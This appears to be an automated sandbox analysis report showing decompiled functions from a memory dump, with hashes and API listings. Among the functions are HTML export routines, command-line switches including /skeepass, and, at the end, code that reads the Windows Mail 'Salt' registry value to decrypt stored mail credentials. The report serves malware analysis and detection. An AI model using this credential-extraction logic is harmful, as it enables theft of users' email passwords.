                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                                                              • String ID: .cfg$0@$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                              • API String ID: 1301239246-2014360536
                                                                                              • Opcode ID: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                                                              • Instruction ID: 2fe98fd5fda5e8878426aecce951da02ffd08f2862891724b98557ab80592e30
                                                                                              • Opcode Fuzzy Hash: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                                                              • Instruction Fuzzy Hash: 3A413972940118ABCB61DB54CC88FDAB7BCEB58304F4441AAF509E7191DB74ABC5CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409482, Relevance: 25.7, APIs: 10, Strings: 7, Instructions: 182stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 80%
                                                                                              			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* __edi;
				void* _t83;
				void* _t100;
				char* _t103;
				intOrPtr* _t120;
				signed int _t121;
				char _t139;
				signed int _t152;
				signed int _t153;
				signed int _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t120 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t121 = 0xc;
				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
				asm("movsb");
				_t156 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t160 = _t158 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
					_t160 = _t160 + 0x14;
				}
				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t156;
				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
					while(1) {
						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
							strcpy( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t156;
						_t157 = _a8;
						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
						E0040F071(_v28,  &_v184);
						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
						_t153 = _t152 * 0x14;
						if(_t100 == 0xffffffff) {
							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
						} else {
							_push( *(_t153 + _v12 + 0x10));
							_push(E0040F071(_t100,  &_v492));
							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
							_t160 = _t160 + 0x10;
						}
						_t103 =  *(_t120 + 0x50);
						_t139 =  *_t103;
						if(_t139 == 0 || _t139 == 0x20) {
							strcat(_t103, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
						E00405EFD(_a4,  *(_t120 + 0x4c));
						_t160 = _t160 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
							goto L14;
						}
						_t156 = 0;
					}
				}
				L14:
				E00405EFD(_a4, "</table><p>");
				return E00405EFD(_a4, 0x412b1c);
			}































                                                                                              0x00409482
                                                                                              0x0040949b
                                                                                              0x004094a2
                                                                                              0x004094a9
                                                                                              0x004094b5
                                                                                              0x004094b7
                                                                                              0x004094ba
                                                                                              0x004094c1
                                                                                              0x004094c5
                                                                                              0x004094d4
                                                                                              0x004094db
                                                                                              0x004094e7
                                                                                              0x004094eb
                                                                                              0x004094f2
                                                                                              0x004094f7
                                                                                              0x00409503
                                                                                              0x00409506
                                                                                              0x0040951f
                                                                                              0x00409524
                                                                                              0x00409524
                                                                                              0x0040952f
                                                                                              0x00409539
                                                                                              0x0040953c
                                                                                              0x00409546
                                                                                              0x0040954c
                                                                                              0x0040955b
                                                                                              0x00409566
                                                                                              0x0040956c
                                                                                              0x0040956f
                                                                                              0x00409573
                                                                                              0x00409577
                                                                                              0x0040957f
                                                                                              0x00409582
                                                                                              0x0040958d
                                                                                              0x0040959a
                                                                                              0x004095ae
                                                                                              0x004095bc
                                                                                              0x004095c3
                                                                                              0x004095c6
                                                                                              0x004095cc
                                                                                              0x00409601
                                                                                              0x004095ce
                                                                                              0x004095d1
                                                                                              0x004095e4
                                                                                              0x004095ed
                                                                                              0x004095f2
                                                                                              0x004095f2
                                                                                              0x00409608
                                                                                              0x0040960b
                                                                                              0x0040960f
                                                                                              0x0040961c
                                                                                              0x00409622
                                                                                              0x0040962c
                                                                                              0x00409650
                                                                                              0x0040965b
                                                                                              0x00409660
                                                                                              0x00409663
                                                                                              0x0040966c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409544
                                                                                              0x00409544
                                                                                              0x00409546
                                                                                              0x00409672
                                                                                              0x0040967a
                                                                                              0x00409692

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004094A2
                                                                                              • memset.MSVCRT ref: 004094C5
                                                                                              • memset.MSVCRT ref: 004094DB
                                                                                              • memset.MSVCRT ref: 004094EB
                                                                                              • sprintf.MSVCRT ref: 0040951F
                                                                                              • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                                                              • sprintf.MSVCRT ref: 004095ED
                                                                                              • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                                                                • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                                                              • strcpy.MSVCRT(?,?), ref: 00409601
                                                                                              • sprintf.MSVCRT ref: 00409650
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                              • API String ID: 2822972341-601624466
                                                                                              • Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                              • Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
                                                                                              • Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                              • Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409EC4, Relevance: 25.6, APIs: 17, Instructions: 108windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 58%
                                                                                              			E00409EC4(void* __eax) {
				void* _v36;
				long _v40;
				void* _v44;
				void* _v56;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				void* _t47;

				_t40 = ImageList_Create;
				_t47 = __eax;
				_t44 = __imp__ImageList_SetImageCount;
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
					 *(_t47 + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
				}
				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
					 *(_t47 + 0x190) = _t34;
					 *_t44(_t34, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
				}
				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
				 *(_t47 + 0x188) = _t21;
				 *_t44(_t21, 2);
				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
				_t42 = _t24;
				 *_t44( *(_t47 + 0x188), 0);
				_t26 = GetSysColor(0xf);
				_v40 = _t26;
				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
				DeleteObject(_v56);
				DeleteObject(_t42);
				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
			}
















                                                                                              0x00409ec7
                                                                                              0x00409ed5
                                                                                              0x00409edf
                                                                                              0x00409ee5
                                                                                              0x00409ef1
                                                                                              0x00409ef6
                                                                                              0x00409efc
                                                                                              0x00409f11
                                                                                              0x00409f11
                                                                                              0x00409f1a
                                                                                              0x00409f26
                                                                                              0x00409f2b
                                                                                              0x00409f31
                                                                                              0x00409f46
                                                                                              0x00409f46
                                                                                              0x00409f52
                                                                                              0x00409f57
                                                                                              0x00409f5d
                                                                                              0x00409f93
                                                                                              0x00409f97
                                                                                              0x00409fa1
                                                                                              0x00409fa3
                                                                                              0x00409fa7
                                                                                              0x00409fb8
                                                                                              0x00409fc2
                                                                                              0x00409fcf
                                                                                              0x00409fdb
                                                                                              0x00409fde
                                                                                              0x0040a004

                                                                                              APIs
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                                                              • SendMessageA.USER32 ref: 00409F11
                                                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                                                              • SendMessageA.USER32 ref: 00409F46
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                                                              • LoadImageA.USER32 ref: 00409F7B
                                                                                              • LoadImageA.USER32 ref: 00409F97
                                                                                              • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                                                              • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                                                              • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                                                              • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                                                              • DeleteObject.GDI32(?), ref: 00409FDB
                                                                                              • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                                                              • SendMessageA.USER32 ref: 00409FFC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                                              • String ID:
                                                                                              • API String ID: 3411798969-0
                                                                                              • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                              • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                                                              • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                              • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B841, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 70%
                                                                                              			E0040B841(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push("/shtml");
				L004115B2();
				if(__eax != 0) {
					_push("/sverhtml");
					L004115B2();
					if(__eax != 0) {
						_push("/sxml");
						L004115B2();
						if(__eax != 0) {
							_push("/stab");
							L004115B2();
							if(__eax != 0) {
								_push("/scomma");
								L004115B2();
								if(__eax != 0) {
									_push("/stabular");
									L004115B2();
									if(__eax != 0) {
										_push("/skeepass");
										L004115C4();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 3;
										return _t5;
									}
								} else {
									_t6 = 7;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 6;
							return _t8;
						}
					} else {
						_t9 = 5;
						return _t9;
					}
				} else {
					_t10 = 4;
					return _t10;
				}
			}









                                                                                              0x0040b842
                                                                                              0x0040b847
                                                                                              0x0040b850
                                                                                              0x0040b857
                                                                                              0x0040b85c
                                                                                              0x0040b865
                                                                                              0x0040b86c
                                                                                              0x0040b871
                                                                                              0x0040b87a
                                                                                              0x0040b881
                                                                                              0x0040b886
                                                                                              0x0040b88f
                                                                                              0x0040b896
                                                                                              0x0040b89b
                                                                                              0x0040b8a4
                                                                                              0x0040b8ab
                                                                                              0x0040b8b0
                                                                                              0x0040b8b9
                                                                                              0x0040b8c0
                                                                                              0x0040b8c5
                                                                                              0x0040b8cc
                                                                                              0x0040b8d6
                                                                                              0x0040b8bb
                                                                                              0x0040b8bd
                                                                                              0x0040b8be
                                                                                              0x0040b8be
                                                                                              0x0040b8a6
                                                                                              0x0040b8a8
                                                                                              0x0040b8a9
                                                                                              0x0040b8a9
                                                                                              0x0040b891
                                                                                              0x0040b893
                                                                                              0x0040b894
                                                                                              0x0040b894
                                                                                              0x0040b87c
                                                                                              0x0040b87e
                                                                                              0x0040b87f
                                                                                              0x0040b87f
                                                                                              0x0040b867
                                                                                              0x0040b869
                                                                                              0x0040b86a
                                                                                              0x0040b86a
                                                                                              0x0040b852
                                                                                              0x0040b854
                                                                                              0x0040b855
                                                                                              0x0040b855

                                                                                              APIs
                                                                                              • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                                                              • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _stricmp
                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                              • API String ID: 2884411883-1959339147
                                                                                              • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                              • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                                                              • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                                              • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F243, Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 114stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 92%
                                                                                              			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void _v771;
				char _v772;
				void _v1027;
				char _v1028;
				char _v1284;
				char _v2308;
				char _t47;
				intOrPtr* _t50;
				void* _t57;
				intOrPtr* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				_v1028 = 0;
				memset( &_v1027, 0, 0xfe);
				_v772 = 0;
				memset( &_v771, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t77 = _t76 + 0x24;
				if(_a16 != 0xffffffff) {
					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
					_t77 = _t77 + 0x14;
				}
				if(_a20 != 0xffffffff) {
					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
					strcpy( &_v516, "</font>");
					_t77 = _t77 + 0x1c;
				}
				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
				E00405EFD(_a4,  &_v2308);
				_t47 = _a12;
				_t78 = _t77 + 0x14;
				if(_t47 > 0) {
					_t73 = _a8 + 4;
					_a16 = _t47;
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						_t50 =  *_t73;
						_t79 = _t78 + 0xc;
						if( *_t50 == 0) {
							_v260 = 0;
						} else {
							sprintf( &_v260, " width=\"%s\"", _t50);
							_t79 = _t79 + 0xc;
						}
						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
						_t57 = E00405EFD(_a4,  &_v2308);
						_t78 = _t79 + 0x20;
						_t73 = _t73 + 8;
						_t34 =  &_a16;
						 *_t34 = _a16 - 1;
					} while ( *_t34 != 0);
					return _t57;
				}
				return _t47;
			}





















                                                                                              0x0040f25e
                                                                                              0x0040f264
                                                                                              0x0040f272
                                                                                              0x0040f278
                                                                                              0x0040f286
                                                                                              0x0040f28c
                                                                                              0x0040f291
                                                                                              0x0040f298
                                                                                              0x0040f2b6
                                                                                              0x0040f2bb
                                                                                              0x0040f2bb
                                                                                              0x0040f2c2
                                                                                              0x0040f2e0
                                                                                              0x0040f2f1
                                                                                              0x0040f2f6
                                                                                              0x0040f2f6
                                                                                              0x0040f30c
                                                                                              0x0040f31b
                                                                                              0x0040f320
                                                                                              0x0040f323
                                                                                              0x0040f328
                                                                                              0x0040f332
                                                                                              0x0040f335
                                                                                              0x0040f338
                                                                                              0x0040f341
                                                                                              0x0040f347
                                                                                              0x0040f34c
                                                                                              0x0040f34e
                                                                                              0x0040f353
                                                                                              0x0040f36c
                                                                                              0x0040f355
                                                                                              0x0040f362
                                                                                              0x0040f367
                                                                                              0x0040f367
                                                                                              0x0040f396
                                                                                              0x0040f3a5
                                                                                              0x0040f3aa
                                                                                              0x0040f3ad
                                                                                              0x0040f3b0
                                                                                              0x0040f3b0
                                                                                              0x0040f3b0
                                                                                              0x00000000
                                                                                              0x0040f3b5
                                                                                              0x0040f3b9

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: sprintf$memset$strcpy
                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                              • API String ID: 898937289-3842416460
                                                                                              • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                              • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                                                              • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                              • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E0DA, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040E0DA() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x417518 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryA("psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
					 *0x416fec = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x416fe4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
							 *0x416fdc = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x41710c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x416fe8 = _t2;
									if(_t2 != 0) {
										 *0x417518 = 1;
									}
								}
							}
						}
					}
					if( *0x417518 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}






                                                                                              0x0040e0e1
                                                                                              0x0040e171
                                                                                              0x0040e171
                                                                                              0x0040e0ed
                                                                                              0x0040e0f3
                                                                                              0x0040e0f7
                                                                                              0x0040e170
                                                                                              0x00000000
                                                                                              0x0040e0f9
                                                                                              0x0040e106
                                                                                              0x0040e10a
                                                                                              0x0040e10f
                                                                                              0x0040e117
                                                                                              0x0040e11b
                                                                                              0x0040e120
                                                                                              0x0040e128
                                                                                              0x0040e12c
                                                                                              0x0040e131
                                                                                              0x0040e139
                                                                                              0x0040e13d
                                                                                              0x0040e142
                                                                                              0x0040e14a
                                                                                              0x0040e14e
                                                                                              0x0040e153
                                                                                              0x0040e155
                                                                                              0x0040e155
                                                                                              0x0040e153
                                                                                              0x0040e142
                                                                                              0x0040e131
                                                                                              0x0040e120
                                                                                              0x0040e167
                                                                                              0x0040e16a
                                                                                              0x0040e16a
                                                                                              0x00000000
                                                                                              0x0040e167

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                              • API String ID: 2449869053-232097475
                                                                                              • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                              • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                                                              • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                              • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410525, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136stringregistryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 84%
                                                                                              			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v6;
				char _v7;
				char _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				short* _v24;
				unsigned int _v28;
				char* _v32;
				int _v36;
				intOrPtr _v40;
				signed int _v44;
				void _v299;
				char _v300;
				void _v555;
				char _v556;
				char _v1080;
				void* __esi;
				int _t56;
				intOrPtr _t58;
				intOrPtr _t64;
				char _t92;
				char* _t93;
				void* _t100;
				signed int _t102;
				signed int _t107;
				intOrPtr _t108;
				void* _t113;

				_t113 = __eflags;
				_t100 = __edx;
				_t93 = __eax;
				E004046D7( &_v1080);
				if(E004047A0( &_v1080, _t113) != 0) {
					_t56 = strlen(_t93);
					asm("cdq");
					_t107 = _t56 - _t100 >> 1;
					_t2 = _t107 + 1; // 0x1
					_t58 = _t2;
					L004115D0();
					_t102 = 0;
					_t96 = _t58;
					_v16 = _t58;
					if(_t107 > 0) {
						do {
							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
							_v7 = _t93[1 + _t102 * 2];
							_v6 = 0;
							_t92 = E00406512( &_v8);
							_t96 = _v16;
							 *((char*)(_t102 + _v16)) = _t92;
							_t102 = _t102 + 1;
						} while (_t102 < _t107);
					}
					_v556 = 0;
					memset( &_v555, 0, 0xff);
					_v12 = 0;
					_v300 = 0;
					memset( &_v299, 0, 0xfe);
					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
					if(_t64 != 1) {
						__eflags = _t64 - 2;
						if(_t64 == 2) {
							_push("Software\\Microsoft\\Windows Live Mail");
							goto L7;
						}
					} else {
						_push("Software\\Microsoft\\Windows Mail");
						L7:
						strcpy( &_v300, ??);
						_pop(_t96);
					}
					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
						_v12 = 0xff;
						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
						RegCloseKey(_v20);
					}
					_v40 = _v16;
					_v36 = _v12;
					_v32 =  &_v556;
					_v44 = _t107;
					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
						_t108 = _a8;
						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
						(_t108 + 0x400)[_v28 >> 1] = 0;
						LocalFree(_v24);
					}
					_push(_v16);
					L004115D6();
				}
				return E004047F1( &_v1080);
			}































                                                                                              0x00410525
                                                                                              0x00410525
                                                                                              0x00410536
                                                                                              0x00410538
                                                                                              0x00410544
                                                                                              0x0041054c
                                                                                              0x00410551
                                                                                              0x00410556
                                                                                              0x00410558
                                                                                              0x00410558
                                                                                              0x0041055c
                                                                                              0x00410562
                                                                                              0x00410566
                                                                                              0x00410567
                                                                                              0x0041056a
                                                                                              0x0041056c
                                                                                              0x0041056f
                                                                                              0x00410576
                                                                                              0x0041057d
                                                                                              0x00410581
                                                                                              0x00410587
                                                                                              0x0041058a
                                                                                              0x0041058d
                                                                                              0x0041058e
                                                                                              0x0041056c
                                                                                              0x004105a1
                                                                                              0x004105a8
                                                                                              0x004105bc
                                                                                              0x004105bf
                                                                                              0x004105c5
                                                                                              0x004105cd
                                                                                              0x004105d9
                                                                                              0x004105e2
                                                                                              0x004105e5
                                                                                              0x004105e7
                                                                                              0x00000000
                                                                                              0x004105e7
                                                                                              0x004105db
                                                                                              0x004105db
                                                                                              0x004105ec
                                                                                              0x004105f3
                                                                                              0x004105f9
                                                                                              0x004105f9
                                                                                              0x00410614
                                                                                              0x00410629
                                                                                              0x0041062c
                                                                                              0x00410637
                                                                                              0x00410637
                                                                                              0x00410640
                                                                                              0x00410646
                                                                                              0x0041064f
                                                                                              0x00410664
                                                                                              0x0041066e
                                                                                              0x00410670
                                                                                              0x00410688
                                                                                              0x00410693
                                                                                              0x0041069d
                                                                                              0x0041069d
                                                                                              0x004106a3
                                                                                              0x004106a6
                                                                                              0x004106ac
                                                                                              0x004106bb

                                                                                              APIs
                                                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
